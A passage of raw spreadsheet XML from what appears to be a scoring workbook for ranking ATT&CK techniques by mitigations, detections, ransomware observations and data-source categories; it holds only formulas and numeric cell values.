      <c r="Z300">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>6</v>
      </c>
      <c r="AA300">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.06</v>
      </c>
      <c r="AB300">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.06</v>
      </c>
      <c r="AC300" s="29" t="s">
        <v>136</v>
      </c>
      <c r="AD300" s="25" t="str" cm="1">
        <f t="array" ref="AD300">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC300)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE300" s="25">
        <f>IF(AD300="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF300" s="25" t="str" cm="1">
        <f t="array" ref="AF300">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC300)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG300" s="25">
        <f>IF(AF300="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH300" s="25" t="str" cm="1">
        <f t="array" ref="AH300">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC300)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI300" s="25">
        <f>IF(AH300="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ300" s="25" t="str" cm="1">
        <f t="array" ref="AJ300">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC300)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK300" s="25">
        <f>IF(AJ300="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL300" s="25" t="str" cm="1">
        <f t="array" ref="AL300">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC300)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM300" s="25">
        <f>IF(AL300="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN300" s="52">
        <v>1</v>
      </c>
      <c r="AO300" s="51">
        <v>1</v>
      </c>
      <c r="AP300" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>6.2427619047619044E-2</v>
      </c>
      <c r="AQ300" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>9.6980952380952376E-2</v>
      </c>
      <c r="AR300" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>9.6980952380952376E-2</v>
      </c>
      <c r="AS300" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT300" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU30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01" spans="1:47">
      <c r="A301" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.2300000000000002E-2</v>
      </c>
      <c r="B301" s="25">
        <f>SUM(H301,M301,V301)*(1+SUM(AE301,AG301,AI301,AK301,AM301))</f>
        <v>0.32300000000000001</v>
      </c>
      <c r="C301" s="25" t="s">
        <v>1244</v>
      </c>
      <c r="D301" s="25" t="s">
        <v>1245</v>
      </c>
      <c r="E301" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F301" s="51">
        <v>1</v>
      </c>
      <c r="G301" s="51">
        <v>1</v>
      </c>
      <c r="H301" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I301">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J301">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K301">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L301">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M301" s="25">
        <v>0</v>
      </c>
      <c r="N301" s="51">
        <v>0</v>
      </c>
      <c r="O301" s="51">
        <v>0</v>
      </c>
      <c r="P301" s="51">
        <v>0</v>
      </c>
      <c r="Q301" s="51">
        <v>0</v>
      </c>
      <c r="R301" s="51"/>
      <c r="S301" s="51">
        <v>0</v>
      </c>
      <c r="T301" s="51" t="s">
        <v>1246</v>
      </c>
      <c r="U301" s="51">
        <v>15</v>
      </c>
      <c r="V301" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="W301">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>15</v>
      </c>
      <c r="X301">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Y301">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Z301">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA301">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB301">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC301" s="29" t="s">
        <v>399</v>
      </c>
      <c r="AD301" s="25" t="str" cm="1">
        <f t="array" ref="AD301">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC301)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE301" s="25">
        <f>IF(AD301="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF301" s="25" t="str" cm="1">
        <f t="array" ref="AF301">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC301)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG301" s="25">
        <f>IF(AF301="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH301" s="25" t="str" cm="1">
        <f t="array" ref="AH301">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC301)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI301" s="25">
        <f>IF(AH301="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ301" s="25" t="str" cm="1">
        <f t="array" ref="AJ301">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC301)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK301" s="25">
        <f>IF(AJ301="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL301" s="25" t="str" cm="1">
        <f t="array" ref="AL301">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC301)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM301" s="25">
        <f>IF(AL301="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN301" s="59">
        <v>0</v>
      </c>
      <c r="AO301" s="51">
        <v>0</v>
      </c>
      <c r="AP301" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.2300000000000002E-2</v>
      </c>
      <c r="AQ301" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.10766666666666667</v>
      </c>
      <c r="AR301" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.10766666666666667</v>
      </c>
      <c r="AS301" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT301" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU30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02" spans="1:47" ht="32.1">
      <c r="A302" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.4285714285714285E-2</v>
      </c>
      <c r="B302" s="25">
        <f>SUM(H302,M302,V302)*(1+SUM(AE302,AG302,AI302,AK302,AM302))</f>
        <v>0.24285714285714285</v>
      </c>
      <c r="C302" s="25" t="s">
        <v>1247</v>
      </c>
      <c r="D302" s="25" t="s">
        <v>1248</v>
      </c>
      <c r="E302" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F302" s="51">
        <v>1</v>
      </c>
      <c r="G302" s="51">
        <v>1</v>
      </c>
      <c r="H302" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I302">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J302">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K302">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L302">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M302" s="25">
        <v>0</v>
      </c>
      <c r="N302" s="51">
        <v>0</v>
      </c>
      <c r="O302" s="51">
        <v>0</v>
      </c>
      <c r="P302" s="51">
        <v>0</v>
      </c>
      <c r="Q302" s="51">
        <v>0</v>
      </c>
      <c r="R302" s="52" t="s">
        <v>1249</v>
      </c>
      <c r="S302" s="51">
        <v>7</v>
      </c>
      <c r="T302" s="51" t="s">
        <v>1250</v>
      </c>
      <c r="U302" s="51">
        <v>8</v>
      </c>
      <c r="V302" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="W302">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>15</v>
      </c>
      <c r="X302">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Y302">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Z302">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA302">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB302">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC302" s="29" t="s">
        <v>178</v>
      </c>
      <c r="AD302" s="25" t="str" cm="1">
        <f t="array" ref="AD302">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC302)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE302" s="25">
        <f>IF(AD302="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF302" s="25" t="str" cm="1">
        <f t="array" ref="AF302">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC302)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG302" s="25">
        <f>IF(AF302="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH302" s="25" t="str" cm="1">
        <f t="array" ref="AH302">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC302)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI302" s="25">
        <f>IF(AH302="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ302" s="25" t="str" cm="1">
        <f t="array" ref="AJ302">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC302)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK302" s="25">
        <f>IF(AJ302="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL302" s="25" t="str" cm="1">
        <f t="array" ref="AL302">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC302)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM302" s="25">
        <f>IF(AL302="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN302" s="60">
        <v>0</v>
      </c>
      <c r="AO302" s="51">
        <v>0</v>
      </c>
      <c r="AP302" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.4285714285714285E-2</v>
      </c>
      <c r="AQ302" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>8.0952380952380956E-2</v>
      </c>
      <c r="AR302" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>8.0952380952380956E-2</v>
      </c>
      <c r="AS302" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT302" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU30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03" spans="1:47" ht="48">
      <c r="A303" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.1831428571428571E-2</v>
      </c>
      <c r="B303" s="25">
        <f>SUM(H303,M303,V303)*(1+SUM(AE303,AG303,AI303,AK303,AM303))</f>
        <v>0.21831428571428571</v>
      </c>
      <c r="C303" s="25" t="s">
        <v>1251</v>
      </c>
      <c r="D303" s="25" t="s">
        <v>1233</v>
      </c>
      <c r="E303" s="25" t="s">
        <v>1252</v>
      </c>
      <c r="F303" s="51">
        <v>1</v>
      </c>
      <c r="G303" s="51">
        <v>0</v>
      </c>
      <c r="H303" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I303">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J303">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K303">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L303">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M303" s="25">
        <v>0</v>
      </c>
      <c r="N303" s="51">
        <v>0</v>
      </c>
      <c r="O303" s="51">
        <v>0</v>
      </c>
      <c r="P303" s="51">
        <v>0</v>
      </c>
      <c r="Q303" s="51">
        <v>0</v>
      </c>
      <c r="R303" s="52" t="s">
        <v>288</v>
      </c>
      <c r="S303" s="51">
        <v>5</v>
      </c>
      <c r="T303" s="52" t="s">
        <v>289</v>
      </c>
      <c r="U303" s="51">
        <v>10</v>
      </c>
      <c r="V303" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="W303">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>15</v>
      </c>
      <c r="X303">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Y303">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Z303">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA303">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB303">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC303" s="29" t="s">
        <v>496</v>
      </c>
      <c r="AD303" s="25" t="str" cm="1">
        <f t="array" ref="AD303">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC303)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE303" s="25">
        <f>IF(AD303="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF303" s="25" t="str" cm="1">
        <f t="array" ref="AF303">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC303)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG303" s="25">
        <f>IF(AF303="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH303" s="25" t="str" cm="1">
        <f t="array" ref="AH303">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC303)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI303" s="25">
        <f>IF(AH303="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ303" s="25" t="str" cm="1">
        <f t="array" ref="AJ303">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC303)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK303" s="25">
        <f>IF(AJ303="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL303" s="25" t="str" cm="1">
        <f t="array" ref="AL303">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC303)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM303" s="25">
        <f>IF(AL303="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN303" s="60">
        <v>0</v>
      </c>
      <c r="AO303" s="51">
        <v>0</v>
      </c>
      <c r="AP303" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>2.1831428571428571E-2</v>
      </c>
      <c r="AQ303" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>7.277142857142857E-2</v>
      </c>
      <c r="AR303" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>7.277142857142857E-2</v>
      </c>
      <c r="AS303" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT303" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU30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04" spans="1:47" ht="32.1">
      <c r="A304" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>1.9285714285714285E-2</v>
      </c>
      <c r="B304" s="25">
        <f>SUM(H304,M304,V304)*(1+SUM(AE304,AG304,AI304,AK304,AM304))</f>
        <v>0.19285714285714284</v>
      </c>
      <c r="C304" s="25" t="s">
        <v>1253</v>
      </c>
      <c r="D304" s="25" t="s">
        <v>1233</v>
      </c>
      <c r="E304" s="25" t="s">
        <v>1254</v>
      </c>
      <c r="F304" s="51">
        <v>1</v>
      </c>
      <c r="G304" s="51">
        <v>0</v>
      </c>
      <c r="H304" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I304">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J304">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K304">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L304">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M304" s="25">
        <v>0</v>
      </c>
      <c r="N304" s="51">
        <v>0</v>
      </c>
      <c r="O304" s="51">
        <v>0</v>
      </c>
      <c r="P304" s="51">
        <v>0</v>
      </c>
      <c r="Q304" s="51">
        <v>0</v>
      </c>
      <c r="R304" s="52" t="s">
        <v>288</v>
      </c>
      <c r="S304" s="51">
        <v>5</v>
      </c>
      <c r="T304" s="52" t="s">
        <v>289</v>
      </c>
      <c r="U304" s="51">
        <v>10</v>
      </c>
      <c r="V304" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="W304">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>15</v>
      </c>
      <c r="X304">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Y304">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.27272727272727271</v>
      </c>
      <c r="Z304">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA304">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB304">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC304" s="29" t="s">
        <v>1255</v>
      </c>
      <c r="AD304" s="25" t="str" cm="1">
        <f t="array" ref="AD304">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC304)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE304" s="25">
        <f>IF(AD304="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF304" s="25" t="str" cm="1">
        <f t="array" ref="AF304">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC304)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG304" s="25">
        <f>IF(AF304="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH304" s="25" t="str" cm="1">
        <f t="array" ref="AH304">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC304)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI304" s="25">
        <f>IF(AH304="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ304" s="25" t="str" cm="1">
        <f t="array" ref="AJ304">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC304)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK304" s="25">
        <f>IF(AJ304="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL304" s="25" t="str" cm="1">
